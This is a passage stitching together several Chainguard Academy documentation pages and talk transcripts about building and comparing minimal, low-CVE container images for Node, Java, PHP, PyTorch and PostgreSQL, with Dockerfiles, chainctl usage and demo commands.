{"code":"success","meta":{"total":1,"count":1},"payload":[{"msg":"testing","id":"f427f835-3e93-43ad-91c8-d150dffba0f9","createDate":"2023-02-07T14:48:54.256Z"}]} The demo application is now ready. In the next step, you’ll create a Dockerfile to run your app. Before moving along, make sure to stop the server running on your terminal by typing CTRL+C (or CMD+C for macOS users). Step 2: Creating the Dockerfile In your code editor of choice, create a new Dockerfile: nano Dockerfile The following Dockerfile will: Start a new image based on the cgr.dev/chainguard/node:latest container image; Set the work dir to /app inside the container; Copy application files from the current directory to the /app location in the container; Run npm install to install production-only dependencies; Set up additional arguments to the default entrypoint (node), specifying which script to run. Copy this content to your own Dockerfile: FROMcgr.dev/chainguard/nodeENV NODE_ENV=production WORKDIR/appCOPY --chown=node:node ["package.json", "package-lock.json", "server.js", "./"]RUN npm install --omit-devCMD [ "server.js" ]Save the file when you’re finished. You can now build the container with: docker build . --pull -t wolfi-node-server Once the build is finished, run the container with: docker run --rm -it -p 8000:8000 wolfi-node-server And it should work the same way as before: the terminal will be blocked with the application waiting for connections on port 8000. The difference is that this is running inside the container, so we set up a port redirect to receive requests on localhost:8000. curl --request POST \ --url http://localhost:8000/test \ --header 'content-type: application/json' \ --data '{"msg": "testing node wolfi image" }' You can now query the same endpoint to receive the data that was stored in memory when you run the previous command: curl http://localhost:8000/test {"code":"success","meta":{"total":1,"count":1},"payload":[{"msg":"testing node wolfi image","id":"6011f987-b9f8-4442-8253-d54166df5966","createDate":"2023-02-07T15:57:23.520Z"}]} Advanced Usage If your project requires a more specific set of packages that aren't included within the general-purpose Node Chainguard Container, you'll first need to check if the package you want is already available on the wolfi-os repository. Note: If you're building on top of a container image other than the wolfi-base container image, the image will run as a non-root user. Because of this, if you need to install packages with apk install you need to use the USER root directive. If the package is available, you can use the wolfi-base image in a Dockerfile and install what you need with apk, then use the resulting image as base for your app. Check the "Using the wolfi-base Container" section of our images quickstart guide for more information. If the packages you need are not available, you can build your own apks using melange. Please refer to this guide for more information. --- ### Building Minimal Container Images for Applications with Runtimes URL: https://edu.chainguard.dev/chainguard/chainguard-images/how-to-use/minimal-runtime-images/ Last Modified: September 6, 2023 Tags: Chainguard Containers, Product, Video Tools used in this video Docker Resources The Dockerfiles used in this video and other supporting documentation are available on GitHub. Transcript Today, I’d like to talk about how to create minimal secure images when using a language that requires a runtime. 0:12 So here we’re thinking of things like Java, .NET or Python. 0:17 In these cases, you won’t be able to use the scratch image or the Chainguard or Google distroless static images, as they won’t include the files for the runtime. 0:28 In cases like these, we can still follow the approach of having a multistage build with the separate development and production image. 0:36 But this time our production image will need to have the files for the runtime installed. 0:42 So I’d like to work through an example with the Chainguard Maven and JRE images. 0:48 In this example, we’re using code from the pet clinic example application, but we’ve added our own Dockerfiles. 0:57 So you can see here we’re using a Chainguard Maven image to build. 1:02 All we really do is copy in the sources and then run the Maven wrapper script with a package argument and that’s going to produce our JAR file. 1:12 Then in the production image, all we really do is copy the JAR file that’s produced here into the image and set an appropriate entrypoint. 1:24 OK. 1:24 So let’s create this Docker image. 1:27 But the first thing I want to build is actually the “build” target. 1:30 So just building the build image to begin with. Now, because of the Docker cache, my last build that was pretty fast, but if you rebuild this yourself it’s gonna take a little bit longer. 1:43 OK. 1:44 Let’s take a look at that image. 1:47 I can see it’s pretty big. 1:48 So it’s 723 megabytes. 1:51 That’s not too surprising because you’ve got the JDK, Maven and all the resources required to build the JAR in there. 1:58 But it’s not something you’d want to transfer around too much. 2:02 OK. 2:03 So let’s take a look at the production image. 2:06 I’ll get rid of this target part and will rename it. 2:15 And again, it was cached, but this time it’s much smaller. 2:23 So that’s around half the size of the previous image. 2:28 Now, like the static images, we don’t have a shell or a package manager in this image. 2:35 Now, in this case, we didn’t specify a tag. 2:38 So we’ve used the latest version of both Maven and the JRE image. 2:45 This is fine for a lot of use cases, but sometimes you’ll want more control over the exact version of Java you’re using for the JDK and the runtime. 2:55 You can purchase a subscription to Chainguard images and that will give you access to tagged versions of the Java and Maven images. 3:04 But if that’s not feasible, another option is to use the Wolfi base image. 3:09 This allows us to effectively build our own Java image and specify the exact versions we require. 3:21 So we can modify the previous Dockerfile look like this. 3:27 where “FROM wolfi-base” is the major change. 3:31 And then we’re explicitly adding in open JDK version 17 and Maven version 3.9. We also set the Java HOME environment variable, but otherwise, it’s pretty much the same as before. 3:46 Then in the production image, we also use wolfi-base as the base and we add in open JDK version 17 again. 3:54 We also set the non root user. 3:57 So we don’t run as root in production and copy in the JAR as before. 4:04 OK. 4:04 So let’s build this image again. 4:11 I have a cached version. 4:12 So that was pretty fast. 4:15 Now note that this solution isn’t perfect. 4:18 And most notably, the final image is gonna include a shell and a package manager that wasn’t present in the previous build. 4:26 But interestingly, despite that this image is actually smaller than the other image. 4:37 Now, the reason for that is that the JRE image by default includes some locale data and that’s important to some Java applications and not important to some other ones. 4:51 So if you’re running a Java application where you need locale data, you’re going to need to add in a line, something like this and that will make your final image that bit bigger. 5:04 OK. 5:04 Just to round things off. 5:05 Let’s see the image running. 5:13 OK. 5:14 That seems to work. 5:16 So we’ve covered how you can use Chainguard images in applications that require run time. 5:21 And also what your options are if you need a specific version. I’ll add some links in the description that allow you to grab the code that I’ve gone through here. 5:31 But please let me know if you try this out and how it compares to other solutions. 5:36 Ok. 5:36 Thank you for listening. --- ### How To Compare Chainguard Containers with chainctl URL: https://edu.chainguard.dev/chainguard/chainctl-usage/comparing-images/ Last Modified: April 8, 2025 Tags: Chainguard Containers, Product There may be times when you’d like to understand the difference between two Chainguard Containers. For example, you might want to know if there are any significant differences between yesterday’s build and today’s; or perhaps you want to know if any CVEs are present in a newer version of a custom container image. chainctl — Chainguard’s command line interface tool — allows you to directly compare two Chainguard Containers with its images diff feature. This guide outlines how to use the image diffing feature and highlights a few potential use cases for it. Prerequisites In order to use the chainctl images diff subcommand, you’ll need to have a few tools installed. You’ll need chainctl installed on your local machine. Follow our guide on How to Install chainctl to set this up. If you already have chainctl installed, be sure to update it to the latest version with chainctl update. Next, ensure you have Cosign installed. Our guide on How to Install Cosign outlines several methods for installing Cosign. You’ll also need Grype installed on your local machine, as chainctl uses this to scan the images when performing the diff. Follow the installation instructions for your operating system on the Grype project GitHub repository. Lastly, an example command in this guide uses jq — a command-line JSON processor — to make the command’s output more readable. You don’t strictly need to have jq installed in order to use the diff subcommand, but if you’d like you can install it by following the official documentation. Using chainctl images diff The chainctl images diff subcommand accepts the names of two Chainguard Containers as arguments and uses Grype to perform a vulnerability scan on each of them. It then retrieves both container images’ SBOM information and outputs the difference between the two along with the previously obtained Grype data. The diff subcommand follows this general syntax. chainctl images diff $FROM_IMAGE $TO_IMAGE As an example, try comparing the latest public go Chainguard Container with its latest-dev version. chainctl images diff cgr.dev/chainguard/go:latest cgr.dev/chainguard/go:latest-dev | jq This will return output like the following. Fetching vulnerabilities for cgr.dev/chainguard/go@sha256:6fee3fff87854aa6e4762c7998c127436a68b09877f9c1010deca35e0f1e27bc Fetching vulnerabilities for cgr.dev/chainguard/go@sha256:e62ce9fe5e62296186066e647d22cd8d16565d8eee9c2d18541094cec9ddd7a3 { "packages": { "added": [ { "name": "sha256:e62ce9fe5e62296186066e647d22cd8d16565d8eee9c2d18541094cec9ddd7a3", "reference": "pkg:oci/index@sha256:e62ce9fe5e62296186066e647d22cd8d16565d8eee9c2d18541094cec9ddd7a3?mediaType=application%2Fvnd.oci.image.index.v1%2Bjson" }, { "name": "sha256:a5910c192d3bd6e473cd98a0553d55dba1e9ddee240732a91bf4985116f893d0", "reference": "pkg:oci/image@sha256:a5910c192d3bd6e473cd98a0553d55dba1e9ddee240732a91bf4985116f893d0?arch=amd64&mediaType=application%2Fvnd.oci.image.manifest.v1%2Bjson&os=linux" }, { "name": "sha256:35b2716760a4ec6652830a453d692cc7c55893eb8a6b4cc2afabc2bdfad2a10f", "reference": "pkg:oci/image@sha256:35b2716760a4ec6652830a453d692cc7c55893eb8a6b4cc2afabc2bdfad2a10f?arch=arm64&mediaType=application%2Fvnd.oci.image.manifest.v1%2Bjson&os=linux" } ], "removed": [ { "name": "sha256:6fee3fff87854aa6e4762c7998c127436a68b09877f9c1010deca35e0f1e27bc", "reference": "pkg:oci/index@sha256:6fee3fff87854aa6e4762c7998c127436a68b09877f9c1010deca35e0f1e27bc?mediaType=application%2Fvnd.oci.image.index.v1%2Bjson" }, { "name": "sha256:eaeb73fe40e46eabd28837f3b981791984fc40cac4833f872169f09c7c3cb4df", "reference": "pkg:oci/image@sha256:eaeb73fe40e46eabd28837f3b981791984fc40cac4833f872169f09c7c3cb4df?arch=arm64&mediaType=application%2Fvnd.oci.image.manifest.v1%2Bjson&os=linux" }, { "name": "sha256:87d4c21ede568d79d4ca51271dda3bf46a4164be2bcd7405b6b85b49801d3504", "reference": "pkg:oci/image@sha256:87d4c21ede568d79d4ca51271dda3bf46a4164be2bcd7405b6b85b49801d3504?arch=amd64&mediaType=application%2Fvnd.oci.image.manifest.v1%2Bjson&os=linux" } ] }, "vulnerabilities": {} } This command first uses Grype to scan each container image’s vulnerability data and then retrieves both images’ SBOMs. It then outputs the differences that it finds between the two. This sample output indicates that compared to the go:latest container image, the go:latest-dev image has three packages added, three removed, and no unique vulnerabilities. chainctlcompares the images like this because of the order they appear in the command. If you reversed the order of the images in the example command, the packages shown as added and removed would also be flipped: Fetching vulnerabilities for cgr.dev/chainguard/go@sha256:e62ce9fe5e62296186066e647d22cd8d16565d8eee9c2d18541094cec9ddd7a3 Fetching vulnerabilities for cgr.dev/chainguard/go@sha256:6fee3fff87854aa6e4762c7998c127436a68b09877f9c1010deca35e0f1e27bc { "packages": { "added": [ { "name": "sha256:6fee3fff87854aa6e4762c7998c127436a68b09877f9c1010deca35e0f1e27bc", "reference": "pkg:oci/index@sha256:6fee3fff87854aa6e4762c7998c127436a68b09877f9c1010deca35e0f1e27bc?mediaType=application%2Fvnd.oci.image.index.v1%2Bjson" }, { "name": "sha256:eaeb73fe40e46eabd28837f3b981791984fc40cac4833f872169f09c7c3cb4df", "reference": "pkg:oci/image@sha256:eaeb73fe40e46eabd28837f3b981791984fc40cac4833f872169f09c7c3cb4df?arch=arm64&mediaType=application%2Fvnd.oci.image.manifest.v1%2Bjson&os=linux" }, { "name": "sha256:87d4c21ede568d79d4ca51271dda3bf46a4164be2bcd7405b6b85b49801d3504", "reference": "pkg:oci/image@sha256:87d4c21ede568d79d4ca51271dda3bf46a4164be2bcd7405b6b85b49801d3504?arch=amd64&mediaType=application%2Fvnd.oci.image.manifest.v1%2Bjson&os=linux" } ], "removed": [ { "name": "sha256:e62ce9fe5e62296186066e647d22cd8d16565d8eee9c2d18541094cec9ddd7a3", "reference": "pkg:oci/index@sha256:e62ce9fe5e62296186066e647d22cd8d16565d8eee9c2d18541094cec9ddd7a3?mediaType=application%2Fvnd.oci.image.index.v1%2Bjson" }, { "name": "sha256:a5910c192d3bd6e473cd98a0553d55dba1e9ddee240732a91bf4985116f893d0", "reference": "pkg:oci/image@sha256:a5910c192d3bd6e473cd98a0553d55dba1e9ddee240732a91bf4985116f893d0?arch=amd64&mediaType=application%2Fvnd.oci.image.manifest.v1%2Bjson&os=linux" }, { "name": "sha256:35b2716760a4ec6652830a453d692cc7c55893eb8a6b4cc2afabc2bdfad2a10f", "reference": "pkg:oci/image@sha256:35b2716760a4ec6652830a453d692cc7c55893eb8a6b4cc2afabc2bdfad2a10f?arch=arm64&mediaType=application%2Fvnd.oci.image.manifest.v1%2Bjson&os=linux" } ] }, "vulnerabilities": {} } Be aware that because this is a relatively new feature, the format of the diff subcommand’s output is subject to change. Potential use cases Being able to find the exact difference between two Chainguard Containers with a single command allows users to make more informed decisions about what container images they use in their applications. This section goes over a couple scenarios where you may want to use the chainctl images diff command. One potential use case for why you would want to find the differences between two Chainguard Containers is that you’re curious about the differences between available release versions. Say you’re using Custom Chainguard Containers and your application is pinned to a specific version of go. By diffing the two container images, you could check what vulnerabilities you could remove by updating to the next patch or minor version. Another potential use could be in cases where you’re interested in knowing the difference between a Chainguard Container’s daily builds. For example, say you’d like to keep your images updated but only when there are significant changes between daily builds. You could diff between the running versions and the latest builds, only updating if there’s a meaningful difference. Learn more To learn more about the chainctl image subcommands, we encourage you to check out our chainctl command resources. You can also explore the rest of our Chainguard Containers resources to learn more about how images can help you keep your software secure by default. --- ### Getting Started with the PHP Chainguard Container URL: https://edu.chainguard.dev/chainguard/chainguard-images/getting-started/php/ Last Modified: March 24, 2025 Tags: Chainguard Containers, Product The PHP container images maintained by Chainguard include our standard, minimal images and development variants, both of which are suitable for building and running PHP workloads. The latest-fpm variant serves PHP applications over FastCGI, while the latest variant runs PHP applications from the command line. In this guide, we’ll set up a demo and demonstrate how you can use Chainguard Containers to develop, build, and run PHP applications. This tutorial requires Docker to be installed on your local machine. If you don’t have Docker installed, you can download and install it from the official Docker website. What is distroless? Distroless container images are minimalist container images containing only essential software required to build or execute an application. That means no package manager, no shell, and no bloat from software that only makes sense on bare metal servers. What is Wolfi? Wolfi is a community Linux undistro created specifically for containers. This brings distroless to a new level, including additional features targeted at securing the software supply chain of your application environment: comprehensive SBOMs, signatures, daily updates, and timely CVE fixes. Chainguard Images Chainguard Containers are a mix of distroless and development container images based on Wolfi. Daily builds make sure images are up-to-date with the latest package versions and patches from upstream Wolfi. 1. Setting up a (CLI) Demo Application We’ll start by getting the demo application ready. This CLI app generates random names based on a list of nouns and adjectives. To exemplify usage with Composer, the app has a single dependency on minicli, a minimalist CLI framework for PHP. Start by cloning the demos repository to your local machine: git clone git@github.com:chainguard-dev/edu-images-demos.git Locate the namegen demo and cd into its directory: cd edu-images-demos/php/namegen You can use the php:latest-dev image variant with a volume in order to install application dependencies with Composer. We’ll use the root user to be able to write to the volume mounted in the container: docker run --rm -v ${PWD}:/app --entrypoint composer --user root \ cgr.dev/chainguard/php:latest-dev \ install --no-progress --no-dev --prefer-dist You’ll get output like this, indicating that the package minicli/minicli was installed: Installing dependencies from lock file Verifying lock file contents can be installed on current platform. Package operations: 1 install, 0 updates, 0 removals - Downloading minicli/minicli (4.2.0) - Installing minicli/minicli (4.2.0): Extracting archive Generating autoload files 1 package you are using is looking for funding. Use the `composer fund` command to find out more! Next, make sure permissions are set correctly on the generated files. On Linux systems run the following: sudo chown -R ${USER}:${USER} . On macOS systems, run this: sudo chown -R ${USER} . The application should now be ready to be executed. For transparency, here is the code that will be executed, which you’ll find in the namegen script: #!/usr/bin/php <?php require __DIR__ . '/vendor/autoload.php'; use Minicli\App; $app = new App(); $app->registerCommand('get', function () use ($app) { $animals = [ 'turtle', 'seagull', 'octopus', 'shark', 'whale', 'dolphin', 'walrus', 'penguin', 'seahorse']; $adjectives = [ 'ludicrous', 'mischievous', 'graceful', 'fortuitous', 'charming', 'ravishing', 'gregarious']; $app->getPrinter()->info($adjectives[array_rand($adjectives)] . '-' . $animals[array_rand($animals)]); }); $app->runCommand($argv); You can now execute the app to test it out. Run the following command: docker run --rm -v ${PWD}:/work \ cgr.dev/chainguard/php:latest \ /work/namegen get The command should output a random name combination: ludicrous-walrus In the next step, you’ll build the application in a multi-stage Dockerfile. 2. Building a Distroless Container for the Application We’ll now build a distroless container for the application. To be able to install dependencies with Composer, our build will consist of two stages. First, we’ll build the application using the development variant, a Wolfi-based image that includes Composer and other useful tools for development. Then, we’ll create a separate stage for the final container. The resulting container will be based on the distroless PHP Wolfi image, which means it doesn’t come with Composer or even a shell. For reference, here is the content of the included Dockerfile: FROMcgr.dev/chainguard/php:latest-dev AS builderUSERrootCOPY . /appRUN chown -R php /appUSERphpRUN cd /app && \ composer install --no-progress --no-dev --prefer-distFROMcgr.dev/chainguard/php:latestCOPY --from=builder /app /appENTRYPOINT [ "php", "/app/namegen" ]This Dockerfile will: Start a new build stage based on the php:latest-dev container image and call it builder; Copy files from the current directory to the /app location in the container; Enter the /app directory and run composer install to install any dependencies; Start a new build stage based on the php:latest image; Copy the application from the builder stage; Set up the application as entry point for this container. You can now build the container with: docker build . --pull -t php-namegen You’ll get output similar to this: [+] Building 0.1s (12/12) FINISHED docker:default => [internal] load build definition from Dockerfile 0.0s => => transferring dockerfile: 322B 0.0s => [internal] load metadata for cgr.dev/chainguard/php:latest-dev 0.0s => [internal] load metadata for cgr.dev/chainguard/php:latest 0.0s => [internal] load .dockerignore 0.0s => => transferring context: 2B 0.0s => [internal] load build context 0.0s => => transferring context: 4.86kB 0.0s => [builder 1/4] FROM cgr.dev/chainguard/php:latest-dev 0.0s => [stage-1 1/2] FROM cgr.dev/chainguard/php:latest 0.0s => CACHED [builder 2/4] COPY . /app 0.0s => CACHED [builder 3/4] RUN chown -R php /app 0.0s => CACHED [builder 4/4] RUN cd /app && composer install --no-progress --no-dev --prefer-dist 0.0s => CACHED [stage-1 2/2] COPY --from=builder /app /app 0.0s => exporting to image 0.0s => => exporting layers 0.0s => => writing image sha256:e617d7afd472d4a78d82060eaacd3a1c33310d6a267f6aaf9aa34b44e3ef8e5c 0.0s => => naming to docker.io/library/php-namegen 0.0s Once the build is finished, run the container with: docker run --rm php-namegen get And you should get output similar to what you got before, with a random name combination. fortuitous-octopus If you inspect the container image with a docker image inspect php-namegen, you’ll notice that it has only two layers, thanks to the use of a multi-staging Docker build. docker image inspect php-namegen ... "RootFS": { "Type": "layers", "Layers": [ "sha256:52cf795862535c5f22dac055428527508088becebbe00293457693a5f8fa1df2", "sha256:95a8dc6d81c92158ac032e5167768a04e45f25b3bf4009c5698673c19d36d5c2" ] }, "Metadata": { "LastTagTime": "2024-11-15T12:52:18.412117879+01:00" } } ] In such cases, the last FROM section from the Dockerfile is the one that composes the final image. That’s why in our case it only adds one layer on top of the base php:latest image, containing the COPY command we use to copy the application from the build stage to the final container. It’s worth highlighting that nothing is carried from one stage to the other unless you copy it. That facilitates creating a slim final image with only what’s necessary to execute the application. 3. Working with the PHP-FPM Image Variant The latest-fpm image variant is suitable for running PHP applications over FastCGI, to be served by a web server such as Nginx. In this section, we’ll run a Docker Compose setup using the latest-fpm image variant and the Chainguard Nginx image. The namegen-api demo is a variation of the previous demo, but it serves the random name generation over HTTP. The application responds with a JSON payload containing the animal and adjective combination, and accepts an optional animal parameter to specify the animal for the final suggested name. Start by accessing the namegen-api demo folder. This should be at the same level as the previous namegen demo in the edu-images-demos repository. If your terminal is still open on the previous demo, you can navigate to the namegen-api folder with: cd ../namegen-api The index.php file contains the following code: <?php $animals = [ 'turtle', 'seagull', 'octopus', 'shark', 'whale', 'dolphin', 'walrus', 'penguin', 'seahorse']; $adjectives = [ 'ludicrous', 'mischievous', 'graceful', 'fortuitous', 'charming', 'ravishing', 'gregarious']; $chosenAdjective = $adjectives[array_rand($adjectives)]; $chosenAnimal = $_GET['animal'] ?? $animals[array_rand($animals)]; echo json_encode(['animal' => $chosenAnimal, 'adjective' => $chosenAdjective]); To serve this application over HTTP, we’ll use the latest-fpm image variant in a Docker Compose setup. The following docker-compose.yml is included within the namegen-api folder: services:app:image:cgr.dev/chainguard/php:latest-fpmrestart:unless-stoppedworking_dir:/appvolumes:- ./:/appnginx:image:cgr.dev/chainguard/nginxrestart:unless-stoppedports:- 8000:80volumes:- ./:/app- ./nginx.conf:/etc/nginx/nginx.confThis Docker Compose setup defines two services: app and nginx. The app service uses the latest-fpm image variant and mounts the current directory to the /app directory in the container. The nginx service uses the Chainguard Nginx container image and also mounts the current directory to the /app directory in the container, setting it as the document root with a custom configuration. A second volume replaces the default Nginx configuration with our custom one, included as nginx.conf in the same directory: events { worker_connections 1024; } http { server { listen 80; index index.php index.html; root /app/public; location ~ \.php$ { try_files $uri =404; fastcgi_split_path_info ^(.+\.php)(/.+)$; fastcgi_pass app:9000; fastcgi_index index.php; include fastcgi_params; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; fastcgi_param PATH_INFO $fastcgi_path_info; } location / { try_files $uri $uri/ /index.php?$query_string; gzip_static on; } } } To run this setup, execute: docker-compose up This command will start the services defined in the docker-compose.yml file. You can access the application at http://localhost:8000 in your browser, or you can make a curl request to it: curl http://localhost:8000 You should get a JSON response with a random name combination: {"animal":"octopus","adjective":"ludicrous"} You can also try passing an animal parameter to the URL: curl 'http://localhost:8000?animal=cat' {"animal":"cat","adjective":"mischievous"} To stop the services, you can press Ctrl+C in the terminal where you ran docker-compose up. Advanced Usage If your project requires a more specific set of packages that aren't included within the general-purpose PHP Chainguard Container, you'll first need to check if the package you want is already available on the wolfi-os repository. Note: If you're building on top of a container image other than the wolfi-base container image, the image will run as a non-root user. Because of this, if you need to install packages with apk install you need to use the USER root directive. If the package is available, you can use the wolfi-base image in a Dockerfile and install what you need with apk, then use the resulting image as base for your app. Check the "Using the wolfi-base Container" section of our images quickstart guide for more information. If the packages you need are not available, you can build your own apks using melange. Please refer to this guide for more information. --- ### Create, View, and Delete chainctl Events URL: https://edu.chainguard.dev/chainguard/chainctl-usage/chainctl-events/ Last Modified: May 6, 2025 Tags: chainctl, events, Product This page shows you the basic usage of chainctl events commands. For a full reference of all commands with details and switches, see chainctl Reference. Chainguard events use the CloudEvents specification for describing event data. Chainguard Academy has several deeper guides on Chainguard CloudEvents. You may find our guide on Subscribing to Chainguard CloudEvents to be particularly useful for understanding how to work with events from Chainguard while Chainguard Events provides a deeper dive into the content and make up of events. There are three chainctl events commands available: create, list, and delete. Create event subscriptions To create a new event and subscribe to events in that organization or folder, use: chainctl events subscriptions create $SINK_URL A sink is an addressable or callable resource that can receive incoming events delivered over HTTPS and will translate the delivered event into a returned response that includes promised information. The style and type of response is set by the sink. Depending on the sink, you may be prompted to respond to some questions before this action is complete. You can add a -y to the command to automatically assume yes and run without interaction. View your event subscriptions To retrieve a list of all your Chainguard account’s subscriptions, use: chainctl events subscriptions list This will return a list of IDs and sinks for all of your subscriptions. Delete event subscriptions To delete an existing event, use: chainctl events subscriptions delete $SUBSCRIPTION_ID Depending on the sink, you may be prompted to respond to some questions before this action is complete. You can add a -y to the command to automatically assume yes and run without interaction. --- ### Beyond Zero: Eliminating Vulnerabilities in PyTorch Container Images (PyTorch 2024) URL: https://edu.chainguard.dev/chainguard/chainguard-images/about/beyond_zero_pytorch_2024/ Last Modified: April 8, 2025 Tags: video, Chainguard Containers, Product, AI Recording of Beyond Zero: Eliminating Vulnerabilities in PyTorch Container Containers presented by Dan Fernandez, Srishti Hegde, and Patrick Smyth at PyTorch 2024 Session Description Container images are increasingly the future of production applications at scale, providing reproducibility, robustness, and transparency. As PyTorch images get deployed to production, however, security becomes a major concern. PyTorch has a large attack surface, and building secure PyTorch images can be a challenge. Currently, the official PyTorch runtime container image has 1 CVE (known vulnerabilities) rated critical and 5 CVEs rated high. Improving this situation could secure many deployments that incorporate PyTorch for cloud-based inference or training. In this fast-paced session, we took a deep dive on the official PyTorch image from a vulnerability mitigation perspective, looking hard at included packages, executables, and active CVEs. We identify low-hanging fruit for increasing security, including stripping bloat and building fresh. We also talk about the next level of security practiced in Chainguard’s PyTorch image builds, such as including SBOMs and going distroless. Finally, we consider emerging tools and approaches for analyzing AI artifacts such as models and how these systems can benefit PyTorch in production. Resources from this Video PyTorch Chainguard Container Course: Securing the AI/ML Supply Chain Learning Lab: Chainguard’s AI Containers Chainguard Academy: Getting Started with the PyTorch Chainguard Container Overview: Chainguard’s AI Containers Transcript (Dan Fernandez) Good afternoon everyone and thank you for joining us. We’re going to be presenting Beyond zero: eliminating vulnerabilities in the PyTorch container image. This is a an effort that concluded a couple months ago that focuses on minimizing vulnerabilities in the PyTorch container image. But first my name is Dan Fernandez, I’m a product manager at a company called Chainguard. Today I’m joined by Patrick Smith who’s a staff developer relations engineer at Chainguard and Srishti Hegde who is a delivery engineer. We wanted to start by going over a little bit about why containers are also ideal for AI applications just like they are for other applications and it has to do with a few of their properties such as their portability so you have a consistent development and production environment. They also offer efficiency, allowing you to scale with growing demands and lastly they offer some isolation (not full isolation) and this encapsulation of apps in general that is consistent across environments also allows for the possibility of hybrid workloads which a lot of large organizations are starting or continuing to transition into. We also wanted to share some metrics around the overall adoption of containers for AI applications. As of the end of 2023 there was a 58% increase of GPU instance hours usage. This was by a report from data dog and this has to do with the increase in the need for both training and inference workloads associated with GenAI applications. There’s also an interesting metric here, and this is more of a forecast, but while AI components have not made it to every Enterprise application (even though it sure feels like it has) it is estimated by 2025 90% of most Enterprise applications will have some AI component within them. And lastly the hosting or the spend for cloud resources associated with Cloud applications is estimated to be $200 billion dollars by the end of 2030, this was by a Cloud Revenue estimate offered by Goldman Sachs. So this kind of gives you an idea of why we decided to focus on this, but obviously we’re at the PyTorch conference and we wanted to highlight that really the the important part here is that PyTorch has a key role in the AI supply chain and this is because it has widespread use for both deploying and developing models. The flexibility, the strength of the community, and the ease of use has made it one of the most popular container images across the board and that that means that it has now become the foundation to a lot of libraries and projects. Due to the far-reaching scope and use cases for this specific technology, it now also means that the attack surface for AI applications via PyTorch has also increased significantly over time. So any organization or any Enterprise that is deploying an AI application that is concerned with data privacy also now has to be concerned with maintaining all the components, in this case container images, making sure that they’re up to date. And that’s what we’re going to focus on the rest of this presentation. Patrick is going to walk us through some of the metrics around vulnerabilities associated with the PyTorch image. (Patrick Smyth) All right, thanks Dan! So PyTorch has been downloaded over 10 million times in the last year and so you know this is an application that really matters because if you secure the PyTorch container image you’re securing literally millions of deployments across the planet. So let’s dig a little bit into to PyTorch in terms of security. The last build of the PyTorch container image had 1 critical, 5 high, 40 mediumand over 50 low CVEs. You might be like hey that sounds like a lot. That’s actually not that far off industry standard which is you know maybe even slightly unfortunate. Unfortunately, CVEs do really matter. What are CVEs? They are Common Vulnerabilities and Exposures. They are known vulnerabilities in software that actually affect the security posture of that software and CVEs can be looked up in a database so these are vulnerabilities that can, should, and in some cases must (in the case of for example fed ramp compliance) be remediated. So if you’re doing FedRAMP you need to fix them within a month. So unfortunately there’s an upstream problem. If you’re someone who wants to run a model in inference, wants to develop an application, then probably about maybe 2% of the CVEs that are in that application, that code, or that production deployment might be introduced by your team. The rest come from Upstream, whether they be language runtimes or whether they be OSes. As the person at the end of that you’re responsible for it. But how do you fix all of that? It becomes very difficult. You have to employ cve remediation teams and so on. So at chain guard we create low to no, frequently zero, CVE images. And how do we do that? We do a couple of different things. We build fresh. We patch when needed. We issue advisories and we really strive for the images to be as minimal as possible. And when you’re aiming for zero every removed package really matters because every package is a potential source of CVS that could pop up literally any day. So in terms of zero—well, is zero just a marketing thing? I mean maybe some of you have used CVE scanners. Maybe you’ve played around with this or maybe you’re responsible for this. You may never have actually seen a scan comeb back zero CVS. When I joined Chainguard I was like is this just marketing? But actually we work really hard at this. We do it every day, and we actually do get to zero CVEs, which is kind of remarkable. And I’m still surprised by it. But it’s possible. So let’s get a little into the nitty-gritty. So just to talk about “minimal” for a minute. This is a comparison of the attac surface of the current PyTorch image versus the recently built Chainguard PyTorch image. I’m speaking specifically about the runtime PyTorch image here. So if you look we have about 75 packages in the Chainguard PyTorch image versus about 200 in the current PyTorch image and we have about 400 executables versus 1400 in the current PyTorch image. I’m going to hand things over to Srishti so she can go into a little more detail. (Srishti Hegde) Thank you. So talking about the minimal set of packages, what it really means is a reduction in the image size. And, case in point, our Chainguard PyTorch image is actually only half the size of the Upstream image you see there. So talking about how we arrived there, there are a couple of things. We ship a prod and a Dev variant of the image, and within our prod variant we’ve stripped a lot of things. That’s your shell, development utilities, diagnostic tools, and Network libraries. We’ve also tried to greatly reduce the complexities introduced by package managers by stripping them down to the bare minimum. But not all use cases are production use cases. There are cases where you need to have access to development tools. So you can always use the dev variant of our image, which has access to a larger set of Dev utilities. I think one of the biggest challenges we had in arriving at this place is the very complex version Matrix of all the components that together constitute torch. And as many of you might know, most of them are quite tightly coupled and it’s down to the tool chain that’s actually used to build torch. There’s a lot of back and forth involved. I think as of now the Upstream PyTorch Cuts a release every 5 weeks or so. Every time a new release comes out Chainguard Builds an image for this particular variant in all versions of Python that’s supported. These images are constantly scanned and patched whenever there’s a CVE that shows up. And our images are built nightly, so really they’re fresh as they come. In addition to zero CV and minimal images we also build FIPS- compliant images. So a number of you might have a requirement for these images as well. Though we have a very minimal set of packages it’s always good to know what’s actually running in your system. To that end the PyTorch image that we ship out comes with an SBOM that tells you what’s in the image. The PyTorch image, just like all the other Chainguard images, is compliant with the SLSA standards, which means that you get a verifiable history of the build, giving you information about how the image was built, including the dependencies that went into it, the source code, and the build system itself. (Patrick Smyth) We wanted to provide you with a couple of starting places. So if you’re interested in taking a a test drive of the recently built zero CVE PyTorch image, you can take a look at this QR code on the left, that’s our PyTorch image there in our image catalog. Another great place to start is the recently released Securing the AI/ML Supply Chain course, which has seven modules that cover all sorts of different things from the compliance ecosystem to tooling and scanning and also some training and inference. It’s a great place to start. Similarly, we do a monthly Learning Lab focused on different secure application Frameworks and language runtimes. I just did one on our AI images including PyTorch. If you want to check out the next one coming up you can scan this QR code. This is Wolfi, the tiniest octopus in the world. (We go for minimal here.) You can see him going into his hole. Before we get to questions, I’ll just say that the techniques we’ve discussed here, from building fresh (going from every five weeks to every night), including SBOMs, going minimal—these are all things that could be applied to the current PyTorch image to make it more secure. And that could really affect security in production environments around the world. Thank you all. --- ### Getting Started with the PostgreSQL Chainguard Container URL: https://edu.chainguard.dev/chainguard/chainguard-images/getting-started/postgres/ Last Modified: March 24, 2025 Tags: Chainguard Containers, Product PostgreSQL — commonly known as “Postgres” — is a popular open-source relational database. The PostgreSQL Containers based on Wolfi and maintained by Chainguard provide distroless container images that are suitable for building and running PostgreSQL workloads. Because Chainguard Containers (including the PostgreSQL container image) are rebuilt daily with the latest sources and include the absolute minimum of dependencies, they have significantly fewer vulnerabilities than equivalent container images, typically zero. This means you can use the Chainguard PostgreSQL container image to run Postgres databases in containerized environments with a smaller footprint and greater security. In order to illustrate how the PostgreSQL Chainguard Container might be used in practice, this tutorial involves setting up an example 